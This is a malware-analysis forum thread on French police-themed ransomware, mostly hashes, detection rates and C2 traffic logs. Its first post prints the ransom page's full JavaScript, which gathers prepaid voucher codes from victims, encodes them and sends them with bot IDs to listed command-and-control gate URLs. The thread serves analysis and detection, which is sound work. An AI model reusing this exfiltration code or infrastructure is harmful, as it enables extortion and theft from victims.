French Ransom (Trojan:Win32/Ransom.FL)

Forum for analysis and discussion about malware.

Re: Trojan Ransom / FakePoliceAlert

Postby Xylitol » Sun Dec 11, 2011 9:14 pm

2 French version in attach

27/43 >> 62.8%
http://www.virustotal.com/file-scan/rep ... 1323484597

6/43 >> 14.0%
http://www.virustotal.com/file-scan/rep ... 1323613279

Image

Image

Code: Select all
/*
* Global variables
 */
var debug = false;
var debug_ec = false;

if (debug || debug_ec)
{
    alert("DEBUG! DEBUG! DEBUG!");
    document.getElementById("v3").value = "1";
}

var penalty_amount = 200;
var g_botnet = "fr1";
var g_os_version = "Unknown";
var g_userid = "0";

var RESPONSE_PONG = "Pong!";
var RESPONSE_OK = "OK";
var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";

if (debug)
{
    g_gates = [
        "http://lck-test.net/gate.php",
        "http://lck-test4.net/gate.php", // not exists
        "http://lck-test1.net/gate.php",
        "http://lck-test2.net/gate.php",
        "http://lck-test3.net/gate.php"
        ]
}
else
{
    g_gates = [
      "http://bundespol.com/gate.php",
        "http://yycqparxvohd.com/gate.php",
        "http://wzuoqliyknpz.com/gate.php"
        ]
}

var positions_count = 1;

var g_state = new Object();
g_state.geo_location_lock = false;
g_state.geo_location_set = false;
g_state.report_lock = false;
g_state.report = "";
g_state.report_sent = true;
g_state.gate_selector_lock = false;
g_state.gate_selector_gate_works = true;
g_state.gate_selector_calls_count = 999999;
g_state.gate_selector_gate_index = 0;
g_state.os_version_set = false;
g_state.userid_set = false;

g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";

function print_g_state()
{
    if (debug_ec)
    {
        console.log("dump of g_state:")
        console.log("\tg_state.geo_location_lock: %s", g_state.geo_location_lock ? "true" : "false");
        console.log("\tg_state.geo_location_set: %s", g_state.geo_location_set ? "true" : "false");
        console.log("\tg_state.report_lock: %s", g_state.report_lock ? "true" : "false");
        console.log("\tg_state.report: %s", g_state.report);
        console.log("\tg_state.report_sent: %s", g_state.report_sent ? "true" : "false");
        console.log("\tg_state.gate_selector_lock: %s", g_state.gate_selector_lock ? "true" : "false");
        console.log("\tg_state.gate_selector_gate_works: %s", g_state.gate_selector_gate_works ? "true" : "false");
        console.log("\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count);
        console.log("\tg_state.gate_selector_gate_index: %d (%s)", g_state.gate_selector_gate_index, g_gates[g_state.gate_selector_gate_index]);
        console.log("===================================================================================================");
    }
}

function base64_encode(input, key)
{
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;

    while (i < input.length)
    {
        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2))
        {
            enc3 = enc4 = 64;
        }
        else if (isNaN(chr3))
        {
            enc4 = 64;
        }

        output = output +
            key.charAt(enc1) + key.charAt(enc2) +
            key.charAt(enc3) + key.charAt(enc4);
    }

    return output;
}

/*
 * multitab window's tabs switcher
 */
function switch_tab(content_tab_id, content_id)
{
    document.getElementById('vouchers_info_tab').className = 'close';
    document.getElementById('penalty_form_tab').className = 'close';
    document.getElementById(content_tab_id).className = 'open';

    document.getElementById('vouchers_info').style.display = 'none';
    document.getElementById('penalty_form').style.display = 'none';
    document.getElementById(content_id).style.display = 'block';
    return;
}


/*
* Text input filter
*/

(function()
{   // after loading document init function will be called
    if (window.addEventListener)
        window.addEventListener("load", init, false);
    else if (window.attachEvent)
        window.attachEvent("onload", init);

})();

function register_handler(id)
{
    // register handler function
    if (id.addEventListener)
    {
        id.addEventListener("keypress", filter, false);
    }
    else
    {
        id.onkeypress = filter;
    }

    return;
}

// Find all <input> tags, for which necessary to register event handler
function init()
{
    var inputtags = document.getElementsByTagName("input");
    for(var i = 0; i < inputtags.length; i++) // traverse all tags
    {
        var tag = inputtags[i];
        if (tag.type != "text") continue; // only text fields
        var allowed = tag.getAttribute("allowed");
        if (!allowed) continue; // and only if presents attribute 'allowed'
        // register handler function
        register_handler(tag);
    }
}

// This is event 'keypress' handler, which maintains input filtration.
function filter(event)
{
    // Get event object and character code by portable way
    var e = event || window.event; // Keyboard event object
    var code = e.charCode || e.keyCode; // What key pressed

    // If pressed functional key do not filter it
    if (e.charCode == 0) return true; // Functional key (FF only)
    if (e.ctrlKey || e.altKey) return true; // Pressed Ctrl or Alt
    if (code < 32) return true; // ctrl ASCII code

    // Now get information from input element
    var allowed = this.getAttribute("allowed"); // Allowed characters
    var errorClassName = this.getAttribute("errorclass"); // class name indicating error
    var successClassName = this.getAttribute("successclass"); // class name indicating success

    // Translate key code to character
    var c = String.fromCharCode(code);

    // Check whether character in allowed characters list or not
    if (allowed.indexOf(c) != -1)
    {
        // character c is allowed
        this.className = successClassName;
        return true; // Accept input
    }
    else
    {
        // character c is not allowed
        this.className = errorClassName;
        // Prevent input
        if (e.preventDefault) e.preventDefault();
        if (e.returnValue) e.returnValue = false;
        return false;
    }
}

/*
* End of text input filter
 */



/*
* penalty form support code
 */
function get_position_number_html(position_number)
{
    return "" + (position_number * 1 + 1);
}

function get_voucher_code_html(position_number)
{
    return "<input id='voucher_code" + position_number + "' type='text' size='25' maxlength='19' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder'>";
}

function get_voucher_value_html(position_number)
{
    return "<input id='voucher_value" + position_number + "' type='text' size='14' maxlength='3' value='0' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder' onkeyup='refresh_total()'>";
}

function get_img_minus_html(position_number)
{
    return position_number <= 0 ? "" : "<img src='minus.png' alt='' onclick='delete_voucher_position(" + position_number + ")'>";
}

function add_voucher_position()
{
    var position_number = positions_count;
    positions_count++;

    var newrow = document.all.penalty.insertRow(position_number + 1);
    var newcell = newrow.insertCell(0);
    newcell.innerHTML = get_position_number_html(position_number);
    newcell = newrow.insertCell(1);
    newcell.innerHTML = get_voucher_code_html(position_number);
    newcell = newrow.insertCell(2);
    newcell.innerHTML = get_voucher_value_html(position_number);
    newcell = newrow.insertCell(3);
    newcell.innerHTML = get_img_minus_html(position_number);

    register_handler(document.getElementById("voucher_code"+position_number));
    register_handler(document.getElementById("voucher_value"+position_number));

    return;
}

function delete_voucher_position(position_number)
{
    var i, j;
    var vouchers = new Array();
    var values = new Array();
    var total_amount;

    for(i = 0, j = 0; i < positions_count; i++)
    {
        if (i != position_number)
        {
            vouchers[j] = document.getElementById("voucher_code"+i).value;
            values[j] = document.getElementById("voucher_value"+i).value;
            j++;
        }
    }

    for(i = 0; i < positions_count; i++)
    {
        document.all.penalty.deleteRow(1);
    }
   
    positions_count--;

    for(i = 0; i < positions_count; i++)
    {
        var newrow = document.all.penalty.insertRow(i + 1);
        var newcell = newrow.insertCell(0);
        newcell.innerHTML = get_position_number_html(i);
        newcell = newrow.insertCell(1);
        newcell.innerHTML = get_voucher_code_html(i);
        newcell = newrow.insertCell(2);
        newcell.innerHTML = get_voucher_value_html(i);
        newcell = newrow.insertCell(3);
        newcell.innerHTML = get_img_minus_html(i);
    }

    for(i = 0; i < positions_count; i++)
    {
        document.getElementById("voucher_code"+i).value = vouchers[i];
        document.getElementById("voucher_value"+i).value = values[i];
        register_handler(document.getElementById("voucher_code"+i));
        register_handler(document.getElementById("voucher_value"+i));
    }

    total_amount = 0;
    for(i = 0; i < positions_count; i++)
    {
        total_amount += values[i] * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;

    return;
}

function refresh_total()
{
    var total_amount = 0;
    for(var i = 0; i < positions_count; i++)
    {
        total_amount += document.getElementById("voucher_value"+i).value * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;

    var do_pay = document.getElementById("do_pay");
    //do_pay.disabled = total_amount < penalty_amount ? 'disabled' : '';
    do_pay.disabled = '';

    return total_amount;
}

/*
* End of penalty form support code
 */


/*
* Geoip code
 */
function http_new_request()
{
    if(typeof XMLHttpRequest != "undefined")
    {
        return new XMLHttpRequest();
    }
    else if(window.ActiveXObject)
    {
        var aVersions = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
        for (var i = 0; i < aVersions.length; i++)
        {
            try
            {
                return new ActiveXObject(aVersions[i]);
            }
            catch (e) {}
        }
    }
}

function http_get(target, callback, options)
{
    var request = http_new_request();
    var timer;

    if (options.timeout)
    {
        timer = setTimeout(
            function()
            {
                request.abort();
                if (options.timeoutHandler)
                    options.timeoutHandler(target);
            },
            options.timeout
            )
    }

    request.onreadystatechange = function()
    {
        if (request.readyState == 4)
        {
            if (timer) clearTimeout(timer);
            if (request.status == 200)
            {
                callback(request.responseText);
            }
            else
            {
                if (options.errorHandler) options.errorHandler(request.status, request.statusText);
                else callback(null);
            }
        }
    }

    try
    {
        request.open("GET", target, true);
        request.send(null);
    }

    catch (e) {
    }
}

function set_geo_location()
{
    var options = new Object();

    function cb_set_geo_location(response_text)
    {
        try
        {
            if (response_text == null)
            {
                g_state.geo_location_set = false;
            }
            else
            {
                var re = /Your IP Address(.*?)<b>(.*?)<\/b>/i;
                var s_ip = response_text.match(re)[2].toString();
                re = /ISP:(.*?)<b>(.*?)<\/b>/i;
                var s_isp = response_text.match(re)[2].toString();
                re = /City:(.*?)<b>(.*)<\/b>/i;
                var s_city = response_text.match(re)[2].toString();
                if (s_ip == "")
                {
                    s_ip = "188.28.11.121";
                }
                document.getElementById("v_ip").innerHTML = s_ip;
                document.getElementById("v_city").innerHTML = s_city;
                document.getElementById("v_isp").innerHTML = s_isp;
                g_state.geo_location_set = true;
            }
        }

        catch (e) {}

        finally
        {
            g_state.geo_location_lock = false;
        }
    }

    function cb_set_geo_location_timeout(target)
    {
        g_state.geo_location_set = false;
        g_state.geo_location_lock = false;
    }

    if (!g_state.geo_location_set && !g_state.geo_location_lock)
    {
        g_state.geo_location_lock = true;
        options.timeout = 3000;
        options.timeoutHandler = cb_set_geo_location_timeout;
        http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
    }
}

function select_gate()
{
    var options = new Object();
   
    function cb_select_gate(response_text)
    {
        if (response_text == RESPONSE_PONG)
        {
            g_state.gate_selector_gate_works = true;
            g_state.gate_selector_calls_count = 0;
            if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            g_state.gate_selector_gate_works = false;
            if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.gate_selector_lock = false;
    }

    function cb_select_gate_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.gate_selector_lock = false;
        if (debug_ec) console.log("Pinging gate %s was timeout.");
    }

    if (!g_state.gate_selector_lock && g_state.userid_set)
    {
        if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
        {
            g_state.gate_selector_lock = true;
            if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);

            if (!g_state.gate_selector_gate_works)
            {
                g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
            }

            options.timeout = 5000;
            options.timeoutHandler = cb_select_gate_timeout;
            var os_version = base64_encode(g_os_version, g_base64_std_key);
            http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
        }
    }
}

function send_report()
{
    var options = new Object();
   
    function cb_send_report(response_text)
    {
        if (response_text != RESPONSE_OK)
        {
            g_state.gate_selector_gate_works = false;
            g_state.report_sent = false;
            if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.report_lock = false;
    }

    function cb_send_report_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.report_lock = false;
        if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
    }

    if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
    {
        g_state.report_lock = true;
        if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        // set 'report_sent = true' here to prevent overwriting this flag in
        // moment between changing report value and calling cb_send_report()
        g_state.report_sent = true;
        options.timeout = 5000;
        options.timeoutHandler = cb_send_report_timeout;
        http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
    }
}

function set_os_version()
{
    if (g_state.os_version_set) return;

    var iOS = new Array("Windows 95","Windows NT 4","Windows 98","Win 9x 4.9","Windows NT 5.0","Windows NT 5.1","Windows NT 6.1","Windows NT 5.2","Windows NT 6.0");
    var oOS = new Array("Windows 95","Windows NT 4.0","Windows 98","Windows ME","Windows 2000","Windows XP","Windows Seven","Windows 2003","Windows Vista");
    var os = "";

    for (var i = 0; i < iOS.length; i++)
    {
        if (navigator.userAgent.indexOf(iOS[i]) > -1)
        {
            os = oOS[i];
            break;
        }
    }

    g_os_version = os;
    document.getElementById("v_os").innerHTML = os;
    g_state.os_version_set = true;
    if (debug_ec) console.log("OS version set successfully.");
}

function set_userid()
{
    if (g_state.userid_set) return;

    g_userid = document.getElementById("v3").value;
    if (g_userid != "0")
    {
        g_state.userid_set = true;
        if (debug_ec) console.log("Userid set successfully.");
    }
}

function monitor()
{
    refresh_total();
    set_geo_location();
    set_os_version();
    set_userid();
    select_gate();
    send_report();
}

window.onload = function ()
{
    setInterval(monitor, 1000);
}

function are_vouchers_valid()
{
    var prefix;
    var is_valid = true;
    var ret = true;

    for(var i = 0; i < positions_count; i++)
    {
        var voucher_code = document.getElementById("voucher_code"+i);
        var voucher = voucher_code.value;
        if (voucher.length == 19)
        {
            prefix = voucher.substr(0, 6);
            if (prefix != "633718")
            {
                is_valid = false;
            }
        }
        else if (voucher.length == 16)
        {
            prefix = voucher.substr(0, 1);
            if (prefix != "0")
            {
                is_valid = false;
            }
        }
        else
        {
            is_valid = false;
        }

        if (is_valid)
        {
            voucher_code.className = voucher_code.getAttribute("successclass");
        }
        else
        {
            voucher_code.className = voucher_code.getAttribute("errorclass");
            ret = false;
        }
    }

    return ret;
}

function send_vouchers()
{
    var report = "";

    if (!are_vouchers_valid())
    {
        alert(MSG_WRONG_VOUCHERS);
        return;
    }

    var total = refresh_total();
    if (total < penalty_amount)
    {
        alert(MSG_LOW_TOTAL);
        return;
    }

    for(var i = 0; i < positions_count; i++)
    {
        var voucher = document.getElementById("voucher_code"+i).value;
        var value = document.getElementById("voucher_value"+i).value;
        report += report.length ? "x" : "";
        report += voucher + "-" + value;
    }

    if (report.length > 16)
    {
        report = base64_encode(report, g_base64_priv_key);
        if (g_state.report != report)
        {
            g_state.report = report;
            g_state.report_sent = false;
            if (debug_ec) console.log("Report updated and wait sending.");
        }
    }

    alert(MSG_VOUCHERS_SENT);
    return;
}


Network activity:
Code: Select all
http://papicaton.in/check?a=2
http://tools.ip2location.com/ib2/
• dns: 1 ›› ip: 188.247.135.97 - adresse: PAPICATON.IN


Network activity:
Code: Select all
http://tools.ip2location.com/ib2/
http://bundespol.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://bundespol.com/gate.php?cmd=data&botnet=fr1&userid=ei14b69hk8j2x4n7&report=c34Ncj4Ncj4Ncj4Ncj4NciQOc30=
http://yycqparxvohd.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://wzuoqliyknpz.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
--
• dns: 4 ›› ip: 67.226.152.139 - adresse: BUNDESPOL.COM
addr: BUNDESPOL.COM -- ip: 60.19.30.135
addr: BUNDESPOL.COM -- ip: 217.24.246.7
addr: BUNDESPOL.COM -- ip: 58.128.228.1
addr: BUNDESPOL.COM -- ip: 67.226.152.139
• dns: 4 ›› ip: 58.128.228.1 - adresse: WZUOQLIYKNPZ.COM
addr: WZUOQLIYKNPZ.COM -- ip: 60.30.73.102
addr: WZUOQLIYKNPZ.COM -- ip: 60.19.30.135
addr: WZUOQLIYKNPZ.COM -- ip: 67.226.152.139
addr: WZUOQLIYKNPZ.COM -- ip: 58.128.228.1

Data found inside the exe:
einzahlung@mail.com
lck-test.net
lck-test1.net
lck-test2.net
lck-test3.net
lck-test4.net
CNDROAAYGHMF.COM
YYCQPARXVOHD.COM

http://xylibox.blogspot.com/2011/12/fak ... eting.html
I was a little more motivated because it target my country.
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1634
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 491

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Tue Dec 27, 2011 6:02 am

Ransom for French users

Original VT (8/ 43, 18.6%)

Unpacked VT (6/ 43, 14.0%)

Image

Image

In attach original and unpacked.

Edit: screens were reuploaded.
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

French Ransom (Trojan:Win32/Ransom.FL)

Postby rkhunter » Thu Dec 29, 2011 4:44 am

Another french ransom (screens that above).

Orig VT (15/43, 34.9%)

In attach orig and unpacked.
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Thu Jan 05, 2012 1:02 pm

French ransom

Kaspersky: Trojan-Ransom.Win32.Blocker.gpj

As always, under UPX (but strange, MS detection - VirTool:Win32/Obfuscator.QG)

7/43 >> 16.3%
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Sat Jan 07, 2012 3:33 pm

French winlock - Trojan:Win32/Ransom.FL.

13/43 >> 30.2%

Replaces explorer.exe in system root and its copy in dllcache.

cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Tue Jan 17, 2012 6:18 am

One more French ransom, under UPX

MD5: c19886400c9fc45dbbdd33af8a51ec28

13/43

Replaces explorer.exe and its copy at dllcache.

Image

Requests:
Code: Select all
cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt
vwbulrzmduks.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA
gfnboiygpdti.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA


Unpacked (McAfee told that this is PWS)
9/43

In archive original and unpacked.
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Wed Jan 18, 2012 9:35 am

One more French ransom

MD5: fbdd18a3db17490acfd03416315fb18b

10/43

Seems Microsoft has the problem with this packer, because this is not first time can't bypass it, - VirTool:Win32/Obfuscator.QG
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Winlock / Ransom / ScreenLocker

Postby EP_X0FF » Wed Jan 18, 2012 11:31 am

rkhunter wrote:Seems Microsoft has the problem with this packer, because this is not first time can't bypass it, - VirTool:Win32/Obfuscator.QG


Not really a lack of anything. VirTool:Win32/Obfuscator most related equivalent in Dr.Web bases for example is Trojan.Packed, probably. Such obfuscation techniques are used on various kinds of malware, files with such obfuscation may have virtually any purpose. By default they simple moved to quarantine.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Wed Jan 18, 2012 11:40 am

EP_X0FF wrote:
rkhunter wrote:Seems Microsoft has the problem with this packer, because this is not first time can't bypass it, - VirTool:Win32/Obfuscator.QG


Not really a lack of anything. VirTool:Win32/Obfuscator most related equivalent in Dr.Web bases for example is Trojan.Packed, probably. Such obfuscation techniques are used on various kinds of malware, files with such obfuscation may have virtually any purpose. By default they simple moved to quarantine.

Yes, you right. But I see not many such verdicts, I think this "problem" will solve by MS. Seems there upx->obfustation->upx. Probably this packing method uses by BH.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Winlock / Ransom / ScreenLocker

Postby rkhunter » Thu Jan 19, 2012 11:08 am

French

MD5: b283d86c4f97b526c0ecd8ebffae5444
9/43
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 4 guests